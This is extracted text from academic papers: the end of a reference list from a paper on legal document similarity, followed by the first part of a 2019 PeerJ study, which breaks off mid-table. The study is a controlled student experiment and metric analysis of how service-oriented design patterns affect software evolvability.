text documents via graph convolutional networks. ArXiv preprint. arXiv:arXiv:1802.07459. Mandal A, Mandal A, Chaki R, Saha S, Ghosh K, Pal A, Ghosh S. 2017a. Measuring similarity among legal court case documents. In: Proceedings of the 10th annual ACM India compute conference. ACM. Mandal A, Ghosh K, Bhattacharya A, Pal A, Ghosh S. 2017b. Overview of the FIRE 2017 IRLeD track: information retrieval from legal documents. FIRE (Working Notes). 63–68. Manning C, Raghavan P, Schütze H. 2010. Introduction to information retrieval. Natural Language Engineering 16(1):100–103 DOI 10.1017/S1351324909005129. Mikolov T, Chen K, Corrado G, Dean J. 2013. Efficient estimation of word representa- tions in vector space. ArXiv preprint. arXiv:1301.3781. Moody CE. 2016. Mixing dirichlet topic models and word embeddings to make lda2vec. ArXiv preprint. arXiv:1605.02019. Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 19/20 https://peerj.com http://dx.doi.org/10.3233/SW-160224 https://python-louvain.readthedocs.io/en/latest/ https://python-louvain.readthedocs.io/en/latest/ https://radimrehurek.com/gensim/models/word2vec.html https://radimrehurek.com/gensim/models/word2vec.html http://dx.doi.org/10.1016/j.knosys.2018.03.022 http://arXiv.org/abs/1607.05368 http://arXiv.org/abs/arXiv:1802.07459 http://dx.doi.org/10.1017/S1351324909005129 http://arXiv.org/abs/1301.3781 http://arXiv.org/abs/1605.02019 http://dx.doi.org/10.7717/peerj-cs.262 Nair AM, Wagh RS. Similarity analysis of court judgements using association rule mining on case citation data. Onal KD, Zhang Y, Altingovde IS, Rahman MM, Karagoz P, Brayla A, Dang B, Chang H-L, Kim H, McNamara Q, Angert A, Banner E, Khetan V, McDonnell T, Nguyen AT, Xu D, BC Wallace, de Rijke M, Lease M. 2018. Neural information retrieval: at the end of the early years. Information Retrieval Journal 21(2–3):111–182 DOI 10.1007/s10791-017-9321-y. Ramos J. 2003. Using tf-idf to determine word relevance in document queries. In: Proceedings of the first instructional conference on machine learning. 242. Saravanan M, Ravindran B, Raman S. 2009. Improving legal information retrieval using an ontological framework. Artificial Intelligence and Law 17(2):101–124 DOI 10.1007/s10506-009-9075-y. Sayyadi H, Raschid L. 2013. A graph analytical approach for topic detection. ACM Transactions on Internet Technology (TOIT) 13(2):1–23. Sokolova M, Japkowicz N, Szpakowicz S. 2006. Beyond accuracy, F-score and ROC: a family of discriminant measures for performance evaluation. In: Australasian joint conference on artificial intelligence. Berlin: Springer. Sugathadasa K, Ayesha B, De Silva N, Perera AS, Jayawardana V, Lakmal D, Perera M. 2018. Legal document retrieval using document vector embeddings and deep learning. In: Science and information conference. Cham: Springer. Van Opijnen M. 2012. Citation analysis and beyond: in search of indicators measuring case law importance. In: JURIX. 250.. Vo NPA, Privault C, Guillot F. 2017. Experimenting word embeddings in assisting legal review. In: Proceedings of the 16th edition of the international conference on articial intelligence and law. ACM. Wagh RS, Anand D. 2017. Application of citation network analysis for improved simi- larity index estimation of legal case documents: a study. In: 2017 IEEE international conference on current trends in advanced computing (ICCTAC). 1–5. Yager RR. 2003. Fuzzy logic methods in recommender systems. Fuzzy Sets and Systems 136(2):133–149 DOI 10.1016/S0165-0114(02)00223-3. Ying Y, Qingping T, Qinzheng X, Ping Z, Panpan L. 2017. A graph-based approach of automatic keyphrase extraction. Procedia Computer Science 107:248–255 DOI 10.1016/j.procs.2017.03.087. Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 20/20 https://peerj.com http://dx.doi.org/10.1007/s10791-017-9321-y http://dx.doi.org/10.1007/s10506-009-9075-y http://dx.doi.org/10.1016/S0165-0114(02)00223-3 http://dx.doi.org/10.1016/j.procs.2017.03.087 http://dx.doi.org/10.7717/peerj-cs.262 work_evnw3zjkvvd63mc2eu2m2ej6gm ---- On the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis On the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis Justus Bogner1,2, Stefan Wagner2 and Alfred Zimmermann1 1 Herman Hollerith Center, University of Applied Sciences Reutlingen, Boeblingen, Baden-Wuerttemberg, Germany 2 Institute of Software Technology/Software Engineering Group, University of Stuttgart, Stuttgart, Baden-Wuerttemberg, Germany ABSTRACT Background: Design patterns are supposed to improve various quality attributes of software systems. However, there is controversial quantitative evidence of this impact. Especially for younger paradigms such as service- and Microservice-based systems, there is a lack of empirical studies. Objective: In this study, we focused on the effect of four service-based patterns—namely Process Abstraction, Service Façade, Decomposed Capability, and Event-Driven Messaging—on the evolvability of a system from the viewpoint of inexperienced developers. Method: We conducted a controlled experiment with Bachelor students (N = 69). Two functionally equivalent versions of a service-based web shop—one with patterns (treatment group), one without (control group)—had to be changed and extended in three tasks. We measured evolvability by the effectiveness and efficiency of the participants in these tasks. Additionally, we compared both system versions with nine structural maintainability metrics for size, granularity, complexity, cohesion, and coupling. Results: Both experiment groups were able to complete a similar number of tasks within the allowed 90 min. Median effectiveness was 1/3. Mean efficiency was 12% higher in the treatment group, but this difference was not statistically significant. Only for the third task, we found statistical support for accepting the alternative hypothesis that the pattern version led to higher efficiency. In the metric analysis, the pattern version had worse measurements for size and granularity while simultaneously having slightly better values for coupling metrics. Complexity and cohesion were not impacted. Interpretation: For the experiment, our analysis suggests that the difference in efficiency is stronger with more experienced participants and increased from task to task. With respect to the metrics, the patterns introduce additional volume in the system, but also seem to decrease coupling in some areas. Conclusions: Overall, there was no clear evidence for a decisive positive effect of using service-based patterns, neither for the student experiment nor for the metric analysis. This effect might only be visible in an experiment setting with higher initial effort to understand the system or with more experienced developers. Subjects World Wide Web and Web Science, Software Engineering Keywords Design patterns, Evolvability, Modifiability, Controlled experiment, Metrics, Service-oriented architecture, Service-based systems, Microservices How to cite this article Bogner J, Wagner S, Zimmermann A. 2019. On the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis. PeerJ Comput. Sci. 5:e213 DOI 10.7717/peerj-cs.213 Submitted 4 May 2019 Accepted 15 July 2019 Published 19 August 2019 Corresponding author Justus Bogner, justus.bogner@iste. uni-stuttgart.de Academic editor Philipp Leitner Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.213 Copyright 2019 Bogner et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.213 mailto:justus.�bogner@�iste.�uni-stuttgart.�de mailto:justus.�bogner@�iste.�uni-stuttgart.�de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.213 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ INTRODUCTION One important concern for enterprise software in today’s digital and fast-moving world is the ability to quickly adapt to new or changing functional or cross-functional requirements. This concern is addressed by the software quality attribute evolvability (sometimes also referred to as modifiability or changeability): the degree of effectiveness and efficiency with which a software system can be modified to adapt or extend it (Rowe, Leaney & Lowe, 1998; International Organization For Standardization, 2011). Several benefits related to this quality attribute were achieved with the rise of service- oriented computing (SOC) (Papazoglou, 2003), such as loose coupling, isolation of the service implementation behind business-relevant interfaces, or convenient reuse and composition. While Service-Oriented Architecture (SOA) (Erl, 2005) is still an important architectural style, Microservices (Newman, 2015; Fowler, 2015) gain more and more popularity as a flexible, lightweight, and decentralized service-oriented variant. One frequently used instrument to enhance modifiability is the application of design patterns. Employing these established solution blueprints for recurring problems is especially common with object-oriented systems. There is, however, also a significant amount of patterns specifically designed for service-based and even Microservice-based systems (Erl, 2009; Rotem-Gal-Oz, 2012; Richardson, 2018). One issue with design patterns is that their relationship with quality attributes (QAs) is often complex and governed by trade-offs. Moreover, while the benefits of patterns for QAs like modifiability seem plausible in theoretical and qualitative studies (Bogner, Wagner & Zimmermann, 2019), quantitative empirical evidence for their effectiveness is of a more controversial nature. In scientific literature, we find studies that do report a positive impact on QAs, studies that do not, and studies that do so under certain conditions or only for selected patterns (Garzás, García & Piattini, 2009; Hegedūs et al., 2012; Ali & Elish, 2013). Awareness of and familiarity with the concrete patterns is often discussed as a prerequisite for their effectiveness. Since most of these studies are concerned with object-oriented or architectural patterns and there is very little empirical research on service-oriented patterns and modifiability, we conducted a controlled experiment to partially address this gap. A total of 69 students in two groups changed and extended two functionally equivalent versions of a service-based web shop system (one pattern version, one non-pattern version) while the time was measured for each task. Independent of this experiment, we also collected structural maintainability metrics (e.g. size, coupling, cohesion) for both system versions to have a foundation for a second comparison. The research objective for this study can therefore be summarized in the following way: Analyze selected service-oriented patterns For the purpose of improving modifiability With respect to effectiveness, efficiency, and structural metrics From the viewpoint of inexperienced software developers (students) In the context of a service-based web shop system Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 2/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ We follow the basic structure of the reporting guidelines for experiments in software engineering as proposed by Jedlitschka, Ciolkowski & Pfahl (2008). The remainder of the paper first presents the technical background (“Background”) by elaborating the concept of (service-oriented) design patterns and discussing related work in the area. After that, we describe the experiment design (“Experiment Design”) and present the experiment results (“Experiment Results”) followed by the metric results (“Metric Analysis”). In the sections thereafter, we provide possible interpretations (“Discussion”) and discuss limitations (“Threats to Validity”). Lastly, we compile the most important lessons learned (“Lessons Learned from the Experiment”) and conclude with a summary as well as potential future work (“Conclusion”). BACKGROUND To understand the motivation behind this study, two topics need to be explained in greater detail: namely patterns as an instrument of software design as well as their relation to QAs, for which we present related work in the area. Design patterns The idea of design patterns originated from the construction and city building language of Alexander, Ishikawa & Silverstein (1977), who conceptualized a network of solution blueprints. The concept was adapted to several other domains including computer science and is very popular in software engineering and software architecture. As such, a pattern is a proven and established solution to a recurring design problem that is documented in a technology-agnostic form and can be implemented in many similar yet not completely identical ways. The documentation is often systematic and standardized within a pattern language and includes for example attributes like context, problem, forces, solution, or related patterns. While the most famous examples are the object-oriented “Gang of Four” design patterns of Gamma et al. (1994), there are meanwhile patterns for software architecture (Buschmann et al., 1996), enterprise applications (Fowler, 2002), message- based integration (Hohpe & Woolf, 2003), or cloud computing (Fehling et al., 2014). There is also a significant body of patterns in the field of SOC. Most of these have been conceptualized for the context of SOA. Prominent examples are the patterns by Erl (2009), Erl et al. (2012), Rotem-Gal-Oz (2012), or Daigneau (2011). They are usually on an architectural level and are for example, concerned with service inventories, communication, and composition, but can also be focused on the design of an individual service. Even though a significant number of SOA patterns seems to be also applicable to Microservices (Bogner, Zimmermann & Wagner, 2018), the first pattern languages for the younger service-based architectural style are emerging (Richardson, 2018). Furthermore, several of these Microservices patterns have existing ancestor patterns from SOA or other contexts. Related work One primary driver for the use of patterns is their impact on QAs like availability, performance, or modifiability. Several studies have been conducted to analyze this complex and controversial relationship. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 3/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ In the context of object-oriented design, Garzás, García & Piattini (2009) conducted a controlled experiment with 47 students who had to analyze and modify four UML class diagrams. One group worked on a standard and straightforward design model while the other had a semantically equivalent version that contained design rules (e.g., “Dependencies between classes must be implemented with abstractions.”) and patterns (e.g. State or Composite). Understandability (via questions) and modifiability (via extension tasks) were measured. Results showed that the latter version with rules and patterns was more difficult to understand (58% less time and 15% more correct answers for the non-pattern version). For modifiability, no statistically significant difference in efficiency could be identified. Hegedūs et al. (2012) used a probabilistic quality model based on ISO/IEC 9126 to analyze the maintainability of more than 300 revisions of the Java GUI framework JHotDraw, which employs well-known object-oriented patterns. Every usage of design patterns in JHotDraw is documented with JavaDoc and there are a lot of revisions that only introduce patterns. The authors conclude from the analysis that the introduction of additional patterns increased the overall maintainability in the system. They measured a strong correlation (r-value: 0.89) between pattern-line-density and maintainability. A broader view on the impact of the “Gang of Four” design patterns on software quality is given by Ali & Elish (2013). Their comparative literature analysis of 17 empirical studies revealed that only four QAs and only a small subset of the patterns have been examined. Moreover, no general consensus concerning the impact could be reached (positive, neutral, or negative). Interestingly, for maintainability, evolution, and change-proneness, the overall tendencies concerning the impact of the analyzed patterns were negative. In the domain of architectural patterns, Kassab, El-Boussaidi & Mili (2012) analyzed the impact of the patterns Pipes and Filters, Layers, Model View Controller, and Broker on the two QAs performance and security. They determined the quantitative effect of patterns on QAs via the proxy of architectural tactics. From these results, they concluded for example, that Model View Controller is best suited for performance while being least suited for security and that the Layers pattern is most accommodating for security. Riaz, Breaux & Williams (2015) conducted a systematic mapping study with the goal to characterize the research design of empirical studies with human subjects about the application of software patterns. Maintenance was the most frequent context with 16 of 30 studies. Nearly half of the studies were concerned with object-oriented design patterns (14). Efficiency and correctness were the most common measures for evaluating the pattern application. The authors also report that differences in experiment design make it difficult to compare the results and that several studies fail to mention limitations as well as how they minimized the threat of biases. In the context of service orientation, Galster & Avgeriou (2012) performed a theoretical qualitative mapping of ∼80 service-based design patterns to the QAs of the S-Cube Quality Reference Model via force resolution maps (impact from -2 to +2). They reported that 53 QAs from the very detailed S-Cube model were not addressed by the patterns. Most mapped QAs were performance and scalability. Since S-Cube does not include some Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 4/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ important QAs, they also used ISO/IEC 9126. For maintainability, they identified a total of 12 patterns. Lastly, Palma et al. (2014) analyzed the impact of service-based patterns and anti-patterns on maintenance and evolution by collecting historical software development meta data (# of Changes and Code Churn) for the FraSCAti system. They observed that services involved in patterns required less maintenance effort. However, this effect was not statistically significant. Services with anti-patterns on the other hand were found to need significantly more maintenance effort, especially for instances of God Component or Service Chain. The presented related work gives an overview of the complex relationship between patterns and QAs and the controversial evidence. Not many empirical quantitative studies exist for service-based patterns in general and their modifiability in particular, which is why we aim to bring additional quantitative insights into this relationship with the results of the first controlled experiment as well as a metric-based analysis. EXPERIMENT DESIGN The research goal for our experiment was to analyze if selected service-based patterns have a significant impact on the evolvability of a system in terms of the completion of modifications within a given time (effectiveness) and the time needed per modification (efficiency). The experiment object was a simple service-based web shop system that has been specifically constructed for this experiment1. It consists of several RESTful Java services for example, customers, orders, products, and notifications and a web based frontend. Data persistence and unnecessary Create Read Update Delete (CRUD) operations have not been fully implemented. As such, the system is reasonably close to a real world web shop, but is still of manageable complexity for an experiment. The online shop domain was chosen because most people are somewhat familiar with it from personal experience. Moreover, it is very common to implement such systems in a service-oriented way. We created two functionally equivalent versions of this web shop. One version was built in an “ordinary” way (see Figs. 1 and 2) while the other version was designed with several service-based patterns that are believed to be beneficial for modifiability, for example, Process Abstraction and Service Façade (see Figs. 3 and 4). Table 1 lists the selected patterns together with their source, intended effect, and relevant task number. In general, the pattern version of the system exhibits a higher base complexity (e.g., more services, special patterns), but has been intentionally prepared for the nature of the task modifications through the used patterns. We chose these patterns because their theoretical benefit for evolvability is well documented. While professional software developers who are familiar with service-based systems and patterns could be fitting experiment subjects, we instead opted for more inexperienced developers, that is, students. First, it is very difficult to convince a large number of software professionals to spend two hours of their valuable time for free on seemingly meaningless coding. And second, if the patterns’ advantages materialize even with inexperienced developers that have little or no conscious knowledge of them, their effect on evolvability must be substantial. However, while it is common to use students in software engineering 1 See https://github.com/xJREB/research- modifiability-pattern-experiment for source code, task descriptions, survey questions, data set, and analysis results. Zenodo mirror for non-source code artifacts: DOI 10.5281/zenodo.3340971. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 5/25 https://github.com/xJREB/research-modifiability-pattern-experiment https://github.com/xJREB/research-modifiability-pattern-experiment https://doi.org/10.5281/zenodo.3340971 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ OrderSrvWebUI ProductSrv CustomerSrv NotificationSrv invokes Figure 1 Version #1 pre-experiment: initial architecture of non-pattern version. Full-size DOI: 10.7717/peerj-cs.213/fig-1 OrderSrvWebUI WarehouseSrv CustomerSrv NotificationSrv invokes CategorySrv ProductSrv Figure 2 Version #1 post-experiment: final architecture of non-pattern version. Full-size DOI: 10.7717/peerj-cs.213/fig-2 OrderProcessSrv (Process Abstraction)WebUI ProductSrvFacade (Service Facade) CustomerSrv NotificationSrv invokes OrderSrv ProductSrv (Decomposed Capability) Kafka Broker publishes Figure 3 Version #2 pre-experiment: initial architecture of pattern version. Full-size DOI: 10.7717/peerj-cs.213/fig-3 Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 6/25 http://dx.doi.org/10.7717/peerj-cs.213/fig-1 http://dx.doi.org/10.7717/peerj-cs.213/fig-2 http://dx.doi.org/10.7717/peerj-cs.213/fig-3 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ experiments, one must be more careful when generalizing the results to the population of all developers. On the plus side, students are often fairly homogeneous participants. Finally, several studies have shown that using students instead of software professionals may affect the results only marginally in a lot of cases (Host, Regnell & Wohlin, 2000; Salman, Misirli & Juristo, 2015; Falessi et al., 2018). Our experiment subjects therefore were Bachelor students (N = 69) that needed to participate in an experiment as part of the “Introduction to Software Engineering” lecture (mostly 2nd and 3rd semesters). Students could choose one of two experiments based on a short description. Data collection was anonymous and experiment performance had no influence on the students’ grades. Participating in the experiment without data collection was also possible to pass the course. During experiment execution, students assigned Table 1 List of applied patterns in system version #2. Pattern name Source Intended effect Task Process abstraction Erl (2009) Details of the order process are abstracted in composition controller; changes can be made in central location (OrderProcessSrv) #1 Service façade Erl (2009) Shields the ProductSrv against all consumers; changes to the interface only have to be addressed at the façade #2 Decomposed capability Erl (2009) Large and incohesive ProductSrv is prepared for future decomposition by internally isolating domain concepts #2 Event-driven messaging/ inversion of communications Erl (2009) and Rotem-Gal-Oz (2012) ProductSrv publishes events instead of directly calling other services; decoupling of producers and consumers #3 OrderProcessSrv (Process Abstraction) WebUI ProductSrvFacade (Service Facade) CustomerSrv NotificationSrv OrderSrv ProductSrv WarehouseSrvCategorySrv Kafka Broker invokes publishes subscribes Figure 4 Version #2 post-experiment: final architecture of pattern version. Full-size DOI: 10.7717/peerj-cs.213/fig-4 Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 7/25 http://dx.doi.org/10.7717/peerj-cs.213/fig-4 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ themselves randomly and unknowingly to one of the two groups by choosing a seat in the PC pool room: either the non-pattern version #1, that is, the control group, or the pattern version #2, that is, the treatment group. As experiment materials, students were provided with a fully configured virtual machine in the university PC pool room. They had documentation and task descriptions in both digital and printed form. They were allowed to use internet search in case of issues. A web interface with automatic tests for validating the completion of each of the three tasks was provided as well. Students were advised to measure their own time per task with a stopwatch of their choosing. Participants had to solve a total of three tasks that depended on each other (see Table 2). In the first task, the ordering process of the web shop system should be adjusted (e.g., customer credit rating check) and extended with an additional process step (sending of an email via the NotificationSrv). Version #2 had been prepared with the Process Abstraction pattern so that all changes had to be implemented in the OrderProcessSrv as opposed to in three different services like in version #1. In the second task, the large ProductSrv had to be decomposed into three smaller services: a ProductSrv to manage only product domain entities, a CategorySrv to manage product categories, and a WarehouseSrv for product availability. Version #2 incorporated the Decomposed Capability pattern to ease the decomposition as well as the Service Façade pattern that shielded the former ProductSrv from consumers. In the final task, a new process in response to adding a new product to the database should be implemented (sending out email and adding the new product to a marketing database). Version #2 provided message-based communication via an Apache Kafka broker that allowed publishing a NewProductEvent, which implements the patterns Event-Driven Messaging and Inversion of Communications. Please refer to the folders workspace-version1/_exercises or workspace-version2/_exercises in our GitHub repository (https://github.com/xJREB/research-modifiability-pattern-experiment) for the complete task descriptions. As response variables for our experiment, we analyzed effectiveness and efficiency (duration per task). Effectiveness of a participant was measured as the percentage of the three tasks he/she successfully completed within the 90 min, that is, 0%, 33%, 67%, or 100%. Efficiency was recorded in seconds or as not available if the task was not completed. Median effectiveness per group was only calculated and tested for the total of all three tasks. For mean efficiency, we additionally also analyzed and compared every individual task to derive the effect per pattern. While these two response variables also depend on the skill of the participants, they can characterize the systems’ evolvability if the two groups Table 2 List of experiment tasks. Task Task description #1 Adjust the web shop ordering process (customer credit rating check, minimum available number of products) and extend it with an additional process step (sending of an email via the NotificationSrv). #2 Decompose the large ProductSrv into three smaller services: a ProductSrv to manage only product domain entities, a CategorySrv to manage product categories, and a WarehouseSrv for product availability. #3 Implement a new process triggered in response to adding a new product to the database. The new process sends out emails and adds the new product to a marketing database. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 8/25 https://github.com/xJREB/research-modifiability-pattern-experiment http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ are large enough and roughly equal in skill. The predictor variable was the group or system version (i.e., control or treatment group). It was either #1 for the non-pattern version or #2 for the pattern version. To formalize our research objective, we constructed five experiment hypotheses H1ij and their respective null hypotheses H0ij, where i denotes the research goal identifier and j the counter if there is more than one hypothesis per goal (see Table 3). For effectiveness (i = 1), we have one hypothesis (j = 1) while for efficiency (i = 2), we have four (1 � j � 4, j ∈ ℕ), namely one per individual task and one for the complete set of tasks at once. Since we have five hypotheses, this also means that we need Bonferroni correction for the significance level of our hypothesis tests to account for the increased probability of type I errors. The necessary significance level a therefore is calculated by dividing the desired significance level by the number of hypotheses, that is, a = 0.05/5 = 0.01. The experiment execution took place in the following way. To prepare participants for the experiment, an introductory presentation was given on a separate day (45 min). A total of 55 of the 69 students attended (∼80%). In this session, the structure and procedure of the experiment were explained. We also described the data collection and analysis process. Furthermore, an introduction to the basic concepts of SOC and RESTful HTTP services was given to ensure a common base level of knowledge. Lastly, the details of the experiment workspace were presented, e.g. Ubuntu VM, Eclipse Integrated Development Environment (IDE), directory structure, build scripts, task validation. The actual experiment took place over the course of the week following the introductory presentation in slots of 10–20 students. In such a slot (∼2 h), there was first a short Table 3 Pairs of Experiment Hypotheses (each in the form of an alternative hypothesis H1ij and its null hypotheses H0ij, where i represents the research goal identifier and j the counter for more than one hypothesis per goal; effectiveness: i = 1, efficiency: i = 2); Evx denotes the effectiveness for version x; Dvx denotes the task durations for version x; Dvx,ty denotes the task durations for version x and task y. Alternative hypothesis Null hypothesis Effectiveness H111: More tasks for the pattern version #2 of the system can be completed within the given time than for the non-pattern version #1: median(Ev2) > median(Ev1) H011: There is no difference in how many tasks can be completed for both versions of the system: median(Ev1) ≈ median(Ev2) Efficiency (task duration) H121: It takes less time to complete task#1 for the pattern version #2 of the system than for the non-pattern version #1: mean(Dv2,t1) < mean(Dv1,t1) H021: There is no difference in the time it takes to complete task#1 for both versions of the system: mean(Dv1,t1) ≈ mean(Dv2,t1) H122: It takes less time to complete task#2 for the pattern version #2 of the system than for the non-pattern version #1: mean(Dv2,t2) < mean(Dv1,t2) H022: There is no difference in the time it takes to complete task#2 for both versions of the system: mean(Dv1,t2) ≈ mean(Dv2,t2) H123: It takes less time to complete task#3 for the pattern version #2 of the system than for the non-pattern version #1: mean(Dv2,t3) < mean(Dv1,t3) H023: There is no difference in the time it takes to complete task#3 for both versions of the system: mean(Dv1,t3) ≈ mean(Dv2,t3) H124: It takes less time to complete a task for the pattern version #2 of the system than for the non-pattern version #1: mean(Dv2) < mean(Dv1) H024: There is no difference in the time it takes to complete a task for both versions of the system: mean(Dv1) ≈ mean(Dv2) Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 9/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ introduction (5 min) explaining the procedure and agenda. Details of what would be measured and what data would be collected via the post-experiment survey were presented. We pointed out that experiment performance had absolutely no influence on the grade. Data collection would be anonymous and participant IDs could not be linked to student IDs. Following these explanations, we asked if there were any questions regarding this process and if it was acceptable for everybody (verbal consent). We also specifically pointed out the option to participate in the experiment without data collection. After that, there was a familiarization period (15 min) during which students should get comfortable with the workspace and the system by reading documentation and playing around with the IDE and the build scripts. This period was followed by the actual task execution with time measurement. Participants had 90 min to complete all three tasks. A web-based evaluation application with automated tests was provided to check for successful task completion. Participants recorded their own time with a stopwatch and paused upon successful validation of a task via the evaluation UI. An experiment administrator was then notified to verify the completion and to document the duration. The timer was then reset and the next task began. After solving all three tasks or after 90 min, participants finally filled out a short web-based survey with questions about the perceived difficulty per task, personal information (e.g. course of study and semester), and their self-reported experience with for example Java, service-based systems, and patterns. Their participant ID and system version was also recorded to relate it to the task durations. It was not possible to identify the student by name via the participant ID, which guaranteed the anonymity of the results. Please refer to the repository for the full list of questions. After completing this survey, participants finished the experiment slot and were allowed to leave. EXPERIMENT RESULTS For the analysis, the documented task duration measurements per participant were first combined with the exported survey results via the participant ID. We then divided the resulting data set into the two groups (version #1 and version #2) and analyzed it with descriptive statistics. Initially, we wanted to ensure that both versions had comparable characteristics and experience, which is the case in most areas (see Table 4). On average, group #1 with 36 participants and group #2 with 33 participants were of roughly the same study program distribution and semester (∼2.5). When comparing programming experience and self-reported skill, group #2 seems to have been slightly more experienced. More participants of group #1, however, attended the introductory presentation (∼13% points more), a factor that was correlated with effectiveness (Kendall’s tau: 0.346, p-value: 0.0019). The standard deviation for most attributes was also similar in both groups and fairly low in general (e.g. around or below 3.0 for most 10-point ordinal scale questions). Therefore, the set of participants could be considered as sufficiently homogeneous. So all in all, the two groups were similar enough to assume equal conditions for an effectiveness and efficiency comparison with respect to the treatment, that is, the patterns. With 1/3, median effectiveness was identical for both groups. Overall, 48 of 69 participants (∼70%) were able to solve task #1, a total of 26 of these additionally solved task Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 10/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ #2 (∼38%), and only 17 participants finished all three tasks (∼25%). Roughly 30% were not able to solve any task, namely 10 out of 36 for group #1 (27.8%) and 11 out of 33 for group #2 (33.3%). The self-reported difficulty/complexity per task (1–10) was also fairly similar for both groups. The only notable exception for this was task #3 which was perceived as 2.61 points less difficult by the pattern group #2 (6.15 vs 3.54 points). When filtering only for the 17 participants who actually finished this task, the difference is nearly identical (2.64 points), even though the estimated difficulty is lower (4.86 vs 2.22). When analyzing participant efficiency, that is, duration for task completion, we observed that the mean duration per completed task for the total of all three tasks was about 12% lower for the pattern group #2 (00:32:45 vs 00:28:50). The analysis per individual task revealed that this is caused by task #2 and #3: group #2 needed on average ∼22% less time for task #2 and ∼51% for task #3 respectively. Task #1, on the other hand, took group #2 ∼15% more time to complete. Table 5 lists the detailed results for this. The efficiency difference can also be conveniently observed in a boxplot that shows the statistical distribution for task duration (in seconds) grouped by system version and task number (see Fig. 5). The next step was hypothesis testing, that is, analyzing if the differences between the groups are statistically significant so that we can reject the null hypotheses. To prepare Table 4 Group characteristics and self-reported experience (SD represents the standard deviation; for experience questions based on the 10-point ordinal scale, 1 represents “not experienced” while 10 represents “very experienced”). Group #1 (no patterns) Group #2 (patterns) Participants 36 (52%) 33 (48%) B.Sc. Business information systems 9 (25%) 7 (21%) B.Sc. Computer science 4 (11%) 4 (12%) B.Sc. Software engineering 22 (61%) 20 (61%) Other study programs 1 (0.03%) 2 (0.06%) Introduction attendance 31 (86%) 24 (73%) Semesters Mean 2.36 2.45 SD 1.15 1.09 Years of programming experience Mean 2.13 2.70 SD 1.80 2.63 Java experience (1–10) Mean 6.03 6.55 SD 2.36 2.18 Web development experience (1–10) Mean 3.61 4.30 SD 2.86 3.19 Service-based systems experience (1–10) Mean 1.58 2.42 SD 1.30 2.68 Design patterns experience (1–10) Mean 3.94 4.61 SD 2.93 3.16 Service-based patterns experience (1–10) Mean 1.86 2.85 SD 1.55 2.48 All experience-related attributes (1–10) Mean 3.41 4.15 Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 11/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ the selection of a suitable statistical test, we first used the Shapiro–Wilk test to check if our samples were non-normally distributed. For all samples, the p-value was substantially smaller than 0.05, so we had to reject the null hypothesis that our data came from a normal distribution. We therefore needed a non-parametric test that could handle non-normal distributions. The Mann–Whitney U test (also known as Wilcoxon–Mann–Whitney test) fulfills this requirement. It checks the null hypothesis that the probability is equal that a random value from one group is less than or greater than a random value from another group. We used an exact implementation correcting for ties that were likely to happen for the effectiveness test (only four different values: 0/3; 1/3; 2/3; 3/3). Since median effectiveness of both groups is identical (1/3), the resulting p-value for the hypothesis test is much too large (0.5903). This means we cannot reject H011 and therefore have no support for H111 that more exercises can be completed for pattern version #2. For efficiency, we first tested all three tasks at once (H124) where we identified a mean difference of about 12%. The resulting p-value of 0.0496 is barely below the 0.05 level, but since we need a significance level of 0.01 due to multiple hypotheses, this is still too large. We therefore cannot confidently reject our null hypothesis H024, that is, we cannot support H124 that the pattern group #2 was overall more efficient on a statistically Table 5 Result measures per group (SD represents the standard deviation; for difficulty questions based on the 10-point ordinal scale, 1 represents “not difficult” while 10 represents “very difficult”). Group #1 (no patterns) Group #2 (patterns) Participants that solved task#1 26 (72%) 22 (67%) Participants that solved task#2 15 (42%) 11 (33%) Participants that solved task#3 7 (19%) 10 (30%) Effectiveness Median 1/3 1/3 1st Quartile 0/3 0/3 3rd Quartile 2/3 3/3 Reported difficulty for task#1 (1–10) Mean 3.52 3.35 SD 2.26 1.92 Reported difficulty for task#2 (1–10) Mean 5.60 5.43 SD 2.63 2.91 Reported difficulty for task#3 (1–10) Mean 6.15 3.54 SD 2.60 2.82 Duration per individual task Mean 00:32:45 (1,965 s) 00:28:50 (1,730 s) SD 00:17:09 (1,029 s) 00:19:11 (1,151 s) Duration for task#1 Mean 00:30:32 (1,832 s) 00:35:10 (2,110 s) SD 00:18:41 (1,121 s) 00:22:03 (1,323 s) Duration for task#2 Mean 00:39:41 (2,381 s) 00:30:47 (1,847 s) SD 00:15:38 (938 s) 00:12:27 (747 s) Duration for task#3 Mean 00:26:07 (1,567 s) 00:12:45 (765 s) SD 00:09:23 (563 s) 00:04:32 (272 s) Duration for All three tasks (in total) 